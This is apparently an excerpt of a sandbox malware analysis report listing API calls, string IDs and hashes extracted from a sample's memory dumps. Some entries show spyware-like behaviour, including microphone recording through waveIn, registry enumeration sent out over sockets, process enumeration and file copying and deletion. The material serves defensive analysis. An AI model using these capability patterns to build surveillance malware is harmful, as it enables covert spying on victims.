                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 65535$udp
                                                                                                                                                                                                                              • API String ID: 0-1267037602
                                                                                                                                                                                                                              • Opcode ID: c63398c9cc0ec048329e95ce5e2acb82a87246096d5a026bb1d939c025f6990a
                                                                                                                                                                                                                              • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c63398c9cc0ec048329e95ce5e2acb82a87246096d5a026bb1d939c025f6990a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00416EF0
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                                                              • String ID: <$@$@FG$TUF
                                                                                                                                                                                                                              • API String ID: 1107811701-3349172182
                                                                                                                                                                                                                              • Opcode ID: a1f6bd0cc37c977826e24e358f289da51cf617f234a93153f5eb971c1b7c1500
                                                                                                                                                                                                                              • Instruction ID: 7f028cae0c7a73d8ed5ab45bf4c11d392e633d4b2c4227d8a6dec9809f335675
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1f6bd0cc37c977826e24e358f289da51cf617f234a93153f5eb971c1b7c1500
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D319C319002099BCB14FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                                                              • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00000A8E,00000000), ref: 00401A11
                                                                                                                                                                                                                              • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                                                              • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                                                              • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                                                              • String ID: XCG$`=G$x=G
                                                                                                                                                                                                                              • API String ID: 1356121797-903574159
                                                                                                                                                                                                                              • Opcode ID: bd87acd98b191e3ae0c52464a28e44baaa39bce40d3daa3a8d9654622614c853
                                                                                                                                                                                                                              • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd87acd98b191e3ae0c52464a28e44baaa39bce40d3daa3a8d9654622614c853
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1454806937-0
                                                                                                                                                                                                                              • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                                              • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?), ref: 00446EC3
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?), ref: 00446F37
                                                                                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00444714
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044472D
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044475F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00444768
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00444774
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                              • Opcode ID: 28f818cb00b2c38fd850152b37abd41f2ce63157ea6365ecbb304dc071b1b393
                                                                                                                                                                                                                              • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28f818cb00b2c38fd850152b37abd41f2ce63157ea6365ecbb304dc071b1b393
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                                                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                                                              • String ID: TUF$TUFTUF$>G$DG$DG
                                                                                                                                                                                                                              • API String ID: 3114080316-72097156
                                                                                                                                                                                                                              • Opcode ID: 694946f2647773e1458cdad1cd0ab7c95e2cace96e0f33e8d2b526e6a8fd5b5b
                                                                                                                                                                                                                              • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 694946f2647773e1458cdad1cd0ab7c95e2cace96e0f33e8d2b526e6a8fd5b5b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?), ref: 00452BD6
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452C59
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452CEC
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452D03
                                                                                                                                                                                                                                • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00446B31
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452D7F
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00452DAA
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00452DB6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2829977744-0
                                                                                                                                                                                                                              • Opcode ID: 4cc936a66b34936f1d7ea4c9037a28f65a5964222df25c604183f7e821bddb7b
                                                                                                                                                                                                                              • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cc936a66b34936f1d7ea4c9037a28f65a5964222df25c604183f7e821bddb7b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: udp
                                                                                                                                                                                                                              • API String ID: 0-4243565622
                                                                                                                                                                                                                              • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                                                              • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                              • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$AllocateHeap
                                                                                                                                                                                                                              • String ID: J7D
                                                                                                                                                                                                                              • API String ID: 3033488037-1677391033
                                                                                                                                                                                                                              • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                              • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,0044A838,?,?,?,?,?,?), ref: 0044A105
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A180
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 0044A19B
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 0044A1C1
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                              • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                              • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID: HE$HE
                                                                                                                                                                                                                              • API String ID: 269201875-1978648262
                                                                                                                                                                                                                              • Opcode ID: 9646bc9111d8c011bc6d4e57164ebf3b30a2777ab51848a7cb2f829f5b6e271b
                                                                                                                                                                                                                              • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9646bc9111d8c011bc6d4e57164ebf3b30a2777ab51848a7cb2f829f5b6e271b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                              • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                                              • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlExitUserThread.NTDLL(00000000), ref: 004017F4
                                                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(00001E64,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExitHeaderThreadUnprepareUserwave
                                                                                                                                                                                                                              • String ID: T=G$p[G$>G$>G
                                                                                                                                                                                                                              • API String ID: 799343363-2461731529
                                                                                                                                                                                                                              • Opcode ID: 544344e5233921199f6286aa9459ee8b43963dac728b99fdc483df88d28ac6c0
                                                                                                                                                                                                                              • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 544344e5233921199f6286aa9459ee8b43963dac728b99fdc483df88d28ac6c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,004664C4,00000000), ref: 0041B16C
                                                                                                                                                                                                                                • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,004664C4,00000000), ref: 0041B173
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                                                                                                                • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                                                                                                                                                • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                                                                                                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID: PgF
                                                                                                                                                                                                                              • API String ID: 2180151492-654241383
                                                                                                                                                                                                                              • Opcode ID: 6fb9a7b8bd4c9d8eeffed820765ae17d9e475cf9bd2bc15138b1734744e49b25
                                                                                                                                                                                                                              • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fb9a7b8bd4c9d8eeffed820765ae17d9e475cf9bd2bc15138b1734744e49b25
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                              • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                                              • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_42e000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 3d69e70559af274fcb655f0a897680ba9bb64504a1d54728d155f8b0882cbcc9
                                                                                                                                                                                                                              • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d69e70559af274fcb655f0a897680ba9bb64504a1d54728d155f8b0882cbcc9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD29
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD34
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD3F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD93
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FD9E
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDA9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044FDB4
